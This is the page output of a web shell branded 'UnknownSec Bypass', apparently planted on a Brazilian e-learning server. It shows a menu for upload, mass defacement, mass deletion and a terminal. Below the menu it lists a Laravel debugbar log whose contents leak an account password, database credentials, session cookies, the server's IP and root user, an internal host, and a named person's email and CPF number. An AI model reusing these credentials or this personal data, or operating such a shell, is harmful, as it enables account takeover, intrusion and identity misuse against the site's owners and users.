UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
eagleead
/
storage
/
debugbar
/ [
drwxrwxrwx
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
caa4cd5cd479f89d3f31d3b6312555dc.json
{"__meta":{"id":"caa4cd5cd479f89d3f31d3b6312555dc","datetime":"2025-12-31 18:22:18","utime":1767216138.220833,"method":"GET","uri":"\/site\/faq\/api-faq","ip":"66.249.66.163"},"php":{"version":"7.1.33-16+ubuntu16.04.1+deb.sury.org+1","interface":"apache2handler"},"messages":{"count":0,"messages":[]},"time":{"start":1767216137.917,"end":1767216138.220891,"duration":0.3038909435272217,"duration_str":"303.89ms","measures":[{"label":"Booting","start":1767216137.917,"relative_start":0,"end":1767216138.172338,"relative_end":1767216138.172338,"duration":0.2553379535675049,"duration_str":"255.34ms","params":[],"collector":null},{"label":"Application","start":1767216138.020034,"relative_start":0.10303401947021484,"end":1767216138.220895,"relative_end":4.0531158447265625e-6,"duration":0.20086097717285156,"duration_str":"200.86ms","params":[],"collector":null}]},"memory":{"peak_usage":18874368,"peak_usage_str":"18MB"},"exceptions":{"count":0,"exceptions":[]},"views":{"nb_templates":0,"templates":[]},"route":{"uri":"GET site\/faq\/api-faq","as":"faq.api.index","controller":"EstudioLMS\\Http\\Controllers\\Site\\SiteController@apiFaq","namespace":"EstudioLMS\\Http\\Controllers","prefix":"\/site\/faq","where":[],"file":"app\/Http\/Controllers\/Site\/SiteController.php:86-95"},"queries":{"nb_statements":12,"nb_failed_statements":0,"accumulated_duration":0.034589999999999996,"accumulated_duration_str":"34.59ms","statements":[{"sql":"select * from `configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00195,"duration_str":"1.95ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `templates` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00126,"duration_str":"1.26ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `boletos` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.0012,"duration_str":"1.2ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `pagarme_recipients` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00103,"duration_str":"1.03ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `themes` where `themes`.`id` = '1' limit 1","type":"query","params":[],"bindings":["1"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00109,"duration_str":"1.09ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `saas_configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00094,"duration_str":"940\u03bcs","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select `customers`.*, `plans`.`id` as `plan_plan_id`, `plans`.`name` as `plan_name`, `plans`.`description` as `plan_description`, `plans`.`server_id` as `plan_server_id`, `plans`.`dataserver_id` as `plan_dataserver_id`, `plans`.`processors` as `plan_processors`, `plans`.`memory` as `plan_memory`, `plans`.`users_limit` as `plan_users_limit`, `plans`.`storage` as `plan_storage`, `plans`.`data_transfer` as `plan_data_transfer`, `plans`.`price` as `plan_price`, `servers`.`host` as `serverHost`, `servers`.`absolute_path` as `serverPath`, `servers`.`root_user` as `serverUser`, `dataservers`.`host` as `dataserverHost`, `dataservers`.`root_user` as `dataserverUser`, `new_subscriptions`.`subscription_hash`, `new_subscriptions`.`start_period`, `new_subscriptions`.`end_period`, `new_subscriptions`.`total_charges`, `new_subscriptions`.`status`, `new_recurrings`.`gross_amount`, `new_recurrings`.`payment_method`, `new_recurrings`.`charge_number`, `new_recurrings`.`due_date`, `new_recurrings`.`boleto_url` from `customers` inner join `plans` on `plan_id` = `plans`.`id` inner join `servers` on `customers`.`server_id` = `servers`.`id` inner join `dataservers` on `customers`.`dataserver_id` = `dataservers`.`id` left join `new_subscriptions` on `customers`.`subscription_hash` = `new_subscriptions`.`subscription_hash` and `new_subscriptions`.`status` < '7' left join `new_recurrings` on `new_subscriptions`.`subscription_hash` = `new_recurrings`.`subscription_hash` and `new_recurrings`.`id` = (SELECT MAX(new_recurrings.id) FROM new_recurrings WHERE new_recurrings.subscription_hash = new_subscriptions.subscription_hash) where `tenant_id` = 'c6fe7a3c2bc80a7c1eb396ae2252dde2' limit 1","type":"query","params":[],"bindings":["7","c6fe7a3c2bc80a7c1eb396ae2252dde2"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.01368,"duration_str":"13.68ms","stmt_id":"","connection":"lmspanel"},{"sql":"select COUNT(*) AS actives, hired_courses.user_id from `hired_courses` inner join `hirings` on `hirings_id` = `hirings`.`id` where `hired_courses`.`status` in ('3', '4') and hirings.gateway_id <> \"PagarMe\" group by `hired_courses`.`user_id` order by `hired_courses`.`user_id` asc","type":"query","params":[],"bindings":["3","4"],"hints":[],"backtrace":[],"duration":0.00155,"duration_str":"1.55ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `customers` where `id` = '1' limit 1","type":"query","params":[],"bindings":["1"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00141,"duration_str":"1.41ms","stmt_id":"","connection":"lmspanel"},{"sql":"select `subscriptions`.*, `subscription_statuses`.`description` from `subscriptions` inner join `subscription_statuses` on `subscription_status_id` = `subscription_statuses`.`id` where `customer_id` = '1' and `subscription_status_id` in ('2', '3', '4') limit 1","type":"query","params":[],"bindings":["1","2","3","4"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00217,"duration_str":"2.17ms","stmt_id":"","connection":"lmspanel"},{"sql":"select * from `configs` limit 1","type":"query","params":[],"bindings":[],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table","The <code>SELECT<\/code> statement has no <code>WHERE<\/code> clause and could examine many more rows than intended","<code>LIMIT<\/code> without <code>ORDER BY<\/code> causes non-deterministic results, depending on the query execution plan"],"backtrace":[],"duration":0.00202,"duration_str":"2.02ms","stmt_id":"","connection":"LMS_1b129b83352b"},{"sql":"select * from `faqs` where `published` = '1' and (select count(*) from `faq_translations` where `faq_translations`.`faq_id` = `faqs`.`id` and `locale` = 'pt') >= 1 order by `created_at` desc","type":"query","params":[],"bindings":["1","pt"],"hints":["Use <code>SELECT *<\/code> only if you need all columns from table"],"backtrace":[],"duration":0.0062900000000000005,"duration_str":"6.29ms","stmt_id":"","connection":"LMS_1b129b83352b"}]},"swiftmailer_mails":{"count":0,"mails":[]},"request":{"format":"html","content_type":"application\/json","status_text":"OK","status_code":"200","request_query":"[]","request_request":"[]","request_headers":"array:10 [\n \"accept-language\" => array:1 [\n 0 => \"en-US\"\n ]\n \"cookie\" => array:1 [\n 0 => \"laravel_session=eyJpdiI6IlZrcUZiZGhEcGczVlJDVHhVaGM3T2c9PSIsInZhbHVlIjoiTVpicXJac0pRbkp4akxZbnlOaVwvRitxVExFZXY5U3ArTmI1RjVtbHd2UHJKKzZFU1poUVQ4U2FHalk2bFR0QTlIVlNBKytmQlJ0a1wva1JQYm5vVE5CUT09IiwibWFjIjoiYTg5M2U0MzMzMTY5NDYzZGVjZmUxMjhlMjZhMjQzNmY4YTdjMGUwZjJjNmZlMzFiZGY4ZmIwZGFjOThmM2Y1NiJ9\"\n ]\n \"pragma\" => array:1 [\n 0 => \"no-cache\"\n ]\n \"referer\" => array:1 [\n 0 => \"https:\/\/ead.eaglesistemas.com.br\/site\/faq\"\n ]\n \"host\" => array:1 [\n 0 => \"ead.eaglesistemas.com.br\"\n ]\n \"connection\" => array:1 [\n 0 => \"keep-alive\"\n ]\n \"accept\" => array:1 [\n 0 => \"application\/json\"\n ]\n \"from\" => array:1 [\n 0 => \"googlebot(at)googlebot.com\"\n ]\n \"user-agent\" => array:1 [\n 0 => \"Mozilla\/5.0 (Linux; Android 6.0.1; Nexus 5X Build\/MMB29P) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/141.0.7390.122 Mobile Safari\/537.36 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)\"\n ]\n \"accept-encoding\" => array:1 [\n 0 => \"gzip, deflate, br\"\n ]\n]","request_server":"array:39 [\n \"REDIRECT_HTTPS\" => \"on\"\n \"REDIRECT_SSL_TLS_SNI\" => \"ead.eaglesistemas.com.br\"\n \"REDIRECT_STATUS\" => \"200\"\n \"HTTPS\" => \"on\"\n \"SSL_TLS_SNI\" => \"ead.eaglesistemas.com.br\"\n \"HTTP_ACCEPT_LANGUAGE\" => \"en-US\"\n \"HTTP_COOKIE\" => \"laravel_session=eyJpdiI6IlZrcUZiZGhEcGczVlJDVHhVaGM3T2c9PSIsInZhbHVlIjoiTVpicXJac0pRbkp4akxZbnlOaVwvRitxVExFZXY5U3ArTmI1RjVtbHd2UHJKKzZFU1poUVQ4U2FHalk2bFR0QTlIVlNBKytmQlJ0a1wva1JQYm5vVE5CUT09IiwibWFjIjoiYTg5M2U0MzMzMTY5NDYzZGVjZmUxMjhlMjZhMjQzNmY4YTdjMGUwZjJjNmZlMzFiZGY4ZmIwZGFjOThmM2Y1NiJ9\"\n \"HTTP_PRAGMA\" => \"no-cache\"\n \"HTTP_REFERER\" => \"https:\/\/ead.eaglesistemas.com.br\/site\/faq\"\n \"HTTP_HOST\" => \"ead.eaglesistemas.com.br\"\n \"HTTP_CONNECTION\" => \"keep-alive\"\n \"HTTP_ACCEPT\" => \"application\/json\"\n \"HTTP_FROM\" => \"googlebot(at)googlebot.com\"\n \"HTTP_USER_AGENT\" => \"Mozilla\/5.0 (Linux; Android 6.0.1; Nexus 5X Build\/MMB29P) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/141.0.7390.122 Mobile Safari\/537.36 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)\"\n \"HTTP_ACCEPT_ENCODING\" => \"gzip, deflate, br\"\n \"PATH\" => \"\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\"\n \"SERVER_SIGNATURE\" => \"\"\n \"SERVER_SOFTWARE\" => \"Apache\"\n \"SERVER_NAME\" => \"ead.eaglesistemas.com.br\"\n \"SERVER_ADDR\" => \"174.138.41.143\"\n \"SERVER_PORT\" => \"443\"\n \"REMOTE_ADDR\" => \"66.249.66.163\"\n \"DOCUMENT_ROOT\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\"\n \"REQUEST_SCHEME\" => \"https\"\n \"CONTEXT_PREFIX\" => \"\"\n \"CONTEXT_DOCUMENT_ROOT\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\"\n \"SERVER_ADMIN\" => \"webmaster@localhost174.138.41.143\"\n \"SCRIPT_FILENAME\" => \"\/mnt\/lmsestudio-instance-vol002\/eagleead\/public\/index.php\"\n \"REMOTE_PORT\" => \"46665\"\n \"REDIRECT_URL\" => \"\/site\/faq\/api-faq\"\n \"GATEWAY_INTERFACE\" => \"CGI\/1.1\"\n \"SERVER_PROTOCOL\" => \"HTTP\/1.1\"\n \"REQUEST_METHOD\" => \"GET\"\n \"QUERY_STRING\" => \"\"\n \"REQUEST_URI\" => \"\/site\/faq\/api-faq\"\n \"SCRIPT_NAME\" => \"\/index.php\"\n \"PHP_SELF\" => \"\/index.php\"\n \"REQUEST_TIME_FLOAT\" => 1767216137.917\n \"REQUEST_TIME\" => 1767216137\n]","request_cookies":"array:1 [\n \"laravel_session\" => \"9441248c503ed8bc13a3c05c9e463e464921f1d7\"\n]","response_headers":"array:3 [\n \"cache-control\" => array:1 [\n 0 => \"no-cache\"\n ]\n \"content-type\" => array:1 [\n 0 => \"application\/json\"\n ]\n \"date\" => array:1 [\n 0 => \"Wed, 31 Dec 2025 21:22:18 GMT\"\n ]\n]","path_info":"\/site\/faq\/api-faq","session_attributes":"array:4 [\n \"planLimite\" => array:50 [\n \"id\" => 1\n \"tenant_id\" => \"c6fe7a3c2bc80a7c1eb396ae2252dde2\"\n \"name\" => \"M\u00e1rlon Mendes Etiene\"\n \"document_number\" => \"04411428776\"\n \"document_type\" => \"cpf\"\n \"project_name\" => \"Eagle EAD\"\n \"project_slug\" => \"eagleead\"\n \"email\" => \"marlon@eaglesistemas.com.br\"\n \"url\" => \"eagle.ead\"\n \"domain\" => \"lmsestudio.com.br\"\n \"plan_id\" => 15\n \"server_id\" => 3\n \"dataserver_id\" => 4\n \"password\" => \"123456aA@\"\n \"password_changed_at\" => \"2025-09-23 18:16:41\"\n \"password_change_required\" => 0\n \"database_name\" => \"LMS_1b129b83352b\"\n \"database_user\" => \"LMS_1b129b83352b\"\n \"database_pwd\" => \"LMS_1b129b83352b\"\n \"absolute_path\" => \"\/mnt\/lmsestudio-instance-vol002\/\"\n \"normal_site\" => 1\n \"active\" => 1\n \"is_free\" => 0\n \"auto_upgrade\" => 0\n \"ssl_activated\" => 1\n \"dns_id\" => \"100482546\"\n \"allow_beta_feature\" => 0\n \"white_label\" => 0\n \"lms_version\" => \"v3.5.1\\n\"\n \"created_at\" => \"2017-09-20 15:11:58\"\n \"updated_at\" => \"2025-09-23 18:16:41\"\n \"gateway_id\" => 12353942\n \"plan_plan_id\" => 15\n \"plan_name\" => \"Plano Premium\"\n \"plan_description\" => \"Plano especial para at\u00e9 10mil alunos + ferramentas premium + plataforma customizada pela nossa equipe + suporte t\u00e9cnico + Ecossistema Neg\u00f3cio Pronto + 2hs de Treinamento Realtime.\"\n \"plan_server_id\" => 1\n \"plan_dataserver_id\" => 1\n \"plan_processors\" => 2\n \"plan_memory\" => 4096\n \"plan_users_limit\" => 10000\n \"plan_storage\" => 184320\n \"plan_data_transfer\" => 184320\n \"plan_price\" => \"987.50\"\n \"serverHost\" => \"174.138.41.143\"\n \"serverPath\" => \"\/mnt\/lmsestudio-instance-vol002\/\"\n \"serverUser\" => \"root\"\n \"dataserverHost\" => \"10.136.96.24\"\n \"dataserverUser\" => \"db001\"\n \"activeUsers\" => 0\n \"storageSize\" => 593.75547409058\n ]\n \"bankSlip\" => array:1 [\n \"type\" => \"free\"\n ]\n \"_token\" => \"7dugRogcjuBVQED3QKLApGTrHfDIaYLah7L2eGTO\"\n \"lang\" => \"pt\"\n]"}}
Copyright © 2026 - UnknownSec